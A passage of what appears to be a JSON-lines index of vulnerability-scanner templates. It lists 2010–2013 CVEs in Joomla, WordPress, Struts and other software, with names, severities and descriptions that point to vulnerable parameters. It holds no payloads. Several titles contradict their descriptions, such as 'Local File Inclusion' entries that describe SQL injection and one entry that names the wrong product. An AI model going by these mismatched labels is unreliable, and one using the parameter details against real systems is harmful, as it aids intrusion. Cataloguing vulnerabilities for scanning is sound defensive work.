have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-2034.yaml"} +{"ID":"CVE-2010-2035","Info":{"Name":"Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-2035.yaml"} +{"ID":"CVE-2010-2036","Info":{"Name":"Joomla! Component Percha Fields Attach 1.0 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-2036.yaml"} +{"ID":"CVE-2010-2037","Info":{"Name":"Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-2037.yaml"} +{"ID":"CVE-2010-2045","Info":{"Name":"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-2045.yaml"} +{"ID":"CVE-2010-2050","Info":{"Name":"Joomla! Component MS Comment 0.8.0b - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-2050.yaml"} +{"ID":"CVE-2010-2122","Info":{"Name":"Joomla! Component simpledownload \u003c=0.9.5 - Arbitrary File Retrieval","Severity":"high","Description":"A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-2122.yaml"} +{"ID":"CVE-2010-2128","Info":{"Name":"Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-2128.yaml"} +{"ID":"CVE-2010-2259","Info":{"Name":"Joomla! Component com_bfsurvey - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-2259.yaml"} +{"ID":"CVE-2010-2307","Info":{"Name":"Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal","Severity":"high","Description":"Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) \"//\" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-2307.yaml"} +{"ID":"CVE-2010-2507","Info":{"Name":"Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-2507.yaml"} +{"ID":"CVE-2010-2680","Info":{"Name":"Joomla! Component jesectionfinder - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-2680.yaml"} +{"ID":"CVE-2010-2682","Info":{"Name":"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-2682.yaml"} +{"ID":"CVE-2010-2857","Info":{"Name":"Joomla! Component Music Manager - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-2857.yaml"} +{"ID":"CVE-2010-2861","Info":{"Name":"Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI","Severity":"high","Description":"Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-2861.yaml"} +{"ID":"CVE-2010-2918","Info":{"Name":"Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion","Severity":"high","Description":"A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-2918.yaml"} +{"ID":"CVE-2010-2920","Info":{"Name":"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-2920.yaml"} +{"ID":"CVE-2010-3203","Info":{"Name":"Joomla! Component PicSell 1.0 - Arbitrary File Retrieval","Severity":"high","Description":"A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-3203.yaml"} +{"ID":"CVE-2010-3426","Info":{"Name":"Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-3426.yaml"} +{"ID":"CVE-2010-4231","Info":{"Name":"Camtron CMNC-200 IP Camera - Directory Traversal","Severity":"high","Description":"The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-4231.yaml"} +{"ID":"CVE-2010-4239","Info":{"Name":"Tiki Wiki CMS Groupware 5.2 - Local File Inclusion","Severity":"critical","Description":"Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2010/CVE-2010-4239.yaml"} +{"ID":"CVE-2010-4282","Info":{"Name":"phpShowtime 2.0 - Directory Traversal","Severity":"high","Description":"Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-4282.yaml"} +{"ID":"CVE-2010-4617","Info":{"Name":"Joomla! Component JotLoader 2.2.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-4617.yaml"} +{"ID":"CVE-2010-4719","Info":{"Name":"Joomla! Component JRadio - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-4719.yaml"} +{"ID":"CVE-2010-4769","Info":{"Name":"Joomla! Component Jimtawl 1.0.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly unspecified other impacts via a .. (dot dot) in the task parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-4769.yaml"} +{"ID":"CVE-2010-4977","Info":{"Name":"Joomla! Component Canteen 1.0 - Local File Inclusion","Severity":"high","Description":"A SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-4977.yaml"} +{"ID":"CVE-2010-5028","Info":{"Name":"Joomla! Component JE Job 1.0 - Local File Inclusion","Severity":"high","Description":"A SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-5028.yaml"} +{"ID":"CVE-2010-5278","Info":{"Name":"MODx manager - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-5278.yaml"} +{"ID":"CVE-2010-5286","Info":{"Name":"Joomla! Component Jstore - 'Controller' Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-5286.yaml"} +{"ID":"CVE-2011-0049","Info":{"Name":"Majordomo2 - SMTP/HTTP Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2011/CVE-2011-0049.yaml"} +{"ID":"CVE-2011-1669","Info":{"Name":"WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)","Severity":"high","Description":"A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2011/CVE-2011-1669.yaml"} +{"ID":"CVE-2011-2744","Info":{"Name":"Chyrp 2.x - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2011/CVE-2011-2744.yaml"} +{"ID":"CVE-2011-2780","Info":{"Name":"Chyrp 2.x - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2011/CVE-2011-2780.yaml"} +{"ID":"CVE-2011-3315","Info":{"Name":"Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2011/CVE-2011-3315.yaml"} +{"ID":"CVE-2011-4336","Info":{"Name":"Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting","Severity":"medium","Description":"Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET \"ajax\" parameter to snarf_ajax.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2011/CVE-2011-4336.yaml"} +{"ID":"CVE-2011-4618","Info":{"Name":"Advanced Text Widget \u003c 2.0.2 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2011/CVE-2011-4618.yaml"} +{"ID":"CVE-2011-4624","Info":{"Name":"GRAND FlAGallery 1.57 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2011/CVE-2011-4624.yaml"} +{"ID":"CVE-2011-4804","Info":{"Name":"Joomla! Component com_kp - 'Controller' Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2011/CVE-2011-4804.yaml"} +{"ID":"CVE-2011-4926","Info":{"Name":"Adminimize 1.7.22 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2011/CVE-2011-4926.yaml"} +{"ID":"CVE-2011-5106","Info":{"Name":"WordPress Plugin Flexible Custom Post Type \u003c 0.1.7 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2011/CVE-2011-5106.yaml"} +{"ID":"CVE-2011-5107","Info":{"Name":"Alert Before Your Post \u003c= 0.1.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2011/CVE-2011-5107.yaml"} +{"ID":"CVE-2011-5179","Info":{"Name":"Skysa App Bar 1.04 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2011/CVE-2011-5179.yaml"} +{"ID":"CVE-2011-5181","Info":{"Name":"ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2011/CVE-2011-5181.yaml"} +{"ID":"CVE-2011-5265","Info":{"Name":"Featurific For WordPress 1.6.2 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2011/CVE-2011-5265.yaml"} +{"ID":"CVE-2012-0392","Info":{"Name":"Apache Struts2 S2-008 RCE","Severity":"critical","Description":"The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2012/CVE-2012-0392.yaml"} +{"ID":"CVE-2012-0394","Info":{"Name":"Apache Struts Dev Mode OGNL Injection","Severity":"critical","Description":"The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not \"a security vulnerability itself.\"\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2012/CVE-2012-0394.yaml"} +{"ID":"CVE-2012-0896","Info":{"Name":"Count Per Day \u003c= 3.1 - download.php f Parameter Traversal Arbitrary File Access","Severity":"high","Description":"An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2012/CVE-2012-0896.yaml"} +{"ID":"CVE-2012-0901","Info":{"Name":"YouSayToo auto-publishing 1.0 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2012/CVE-2012-0901.yaml"} +{"ID":"CVE-2012-0981","Info":{"Name":"phpShowtime 2.0 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2012/CVE-2012-0981.yaml"} +{"ID":"CVE-2012-0991","Info":{"Name":"OpenEMR 4.1 - Local File Inclusion","Severity":"high","Description":"Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2012/CVE-2012-0991.yaml"} +{"ID":"CVE-2012-0996","Info":{"Name":"11in1 CMS 1.2.1 - Local File Inclusion (LFI)","Severity":"high","Description":"Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2012/CVE-2012-0996.yaml"} +{"ID":"CVE-2012-1226","Info":{"Name":"Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities","Severity":"high","Description":"Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2012/CVE-2012-1226.yaml"} +{"ID":"CVE-2012-1823","Info":{"Name":"PHP CGI v5.3.12/5.4.2 Remote Code Execution","Severity":"critical","Description":"sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2012/CVE-2012-1823.yaml"} +{"ID":"CVE-2012-1835","Info":{"Name":"WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2012/CVE-2012-1835.yaml"} +{"ID":"CVE-2012-2371","Info":{"Name":"WP-FaceThumb 0.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2012/CVE-2012-2371.yaml"} +{"ID":"CVE-2012-3153","Info":{"Name":"Oracle Forms \u0026 Reports RCE (CVE-2012-3152 \u0026 CVE-2012-3153)","Severity":"critical","Description":"An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,\n11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown\nvectors related to Report Server Component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2012/CVE-2012-3153.yaml"} +{"ID":"CVE-2012-4242","Info":{"Name":"WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2012/CVE-2012-4242.yaml"} +{"ID":"CVE-2012-4253","Info":{"Name":"MySQLDumper 1.24.4 - Directory Traversal","Severity":"high","Description":"Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2012/CVE-2012-4253.yaml"} +{"ID":"CVE-2012-4273","Info":{"Name":"2 Click Socialmedia Buttons \u003c 0.34 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2012/CVE-2012-4273.yaml"} +{"ID":"CVE-2012-4547","Info":{"Name":"AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting","Severity":"medium","Description":"AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2012/CVE-2012-4547.yaml"} +{"ID":"CVE-2012-4768","Info":{"Name":"WordPress Plugin Download Monitor \u003c 3.3.5.9 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2012/CVE-2012-4768.yaml"} +{"ID":"CVE-2012-4878","Info":{"Name":"FlatnuX CMS - Directory Traversal","Severity":"high","Description":"A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2012/CVE-2012-4878.yaml"} +{"ID":"CVE-2012-4889","Info":{"Name":"ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2012/CVE-2012-4889.yaml"} +{"ID":"CVE-2012-4940","Info":{"Name":"Axigen Mail Server Filename Directory Traversal","Severity":"high","Description":"Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2012/CVE-2012-4940.yaml"} +{"ID":"CVE-2012-5913","Info":{"Name":"WordPress Integrator 1.32 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2012/CVE-2012-5913.yaml"} +{"ID":"CVE-2013-1965","Info":{"Name":"Apache Struts2 S2-012 RCE","Severity":"critical","Description":"Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2013/CVE-2013-1965.yaml"} +{"ID":"CVE-2013-2248","Info":{"Name":"Apache Struts - Multiple Open Redirection Vulnerabilities","Severity":"low","Description":"Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2013/CVE-2013-2248.yaml"} +{"ID":"CVE-2013-2251","Info":{"Name":"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution","Severity":"critical","Description":"In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\", or \"redirectAction:\" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2013/CVE-2013-2251.yaml"} +{"ID":"CVE-2013-2287","Info":{"Name":"WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2013/CVE-2013-2287.yaml"} +{"ID":"CVE-2013-3526","Info":{"Name":"WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter.\"","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2013/CVE-2013-3526.yaml"} +{"ID":"CVE-2013-3827","Info":{"Name":"Javafaces LFI","Severity":"medium","Description":"An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2013/CVE-2013-3827.yaml"} +{"ID":"CVE-2013-4117","Info":{"Name":"WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2013/CVE-2013-4117.yaml"} +{"ID":"CVE-2013-4625","Info":{"Name":"WordPress Plugin Duplicator \u003c 0.4.5 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote 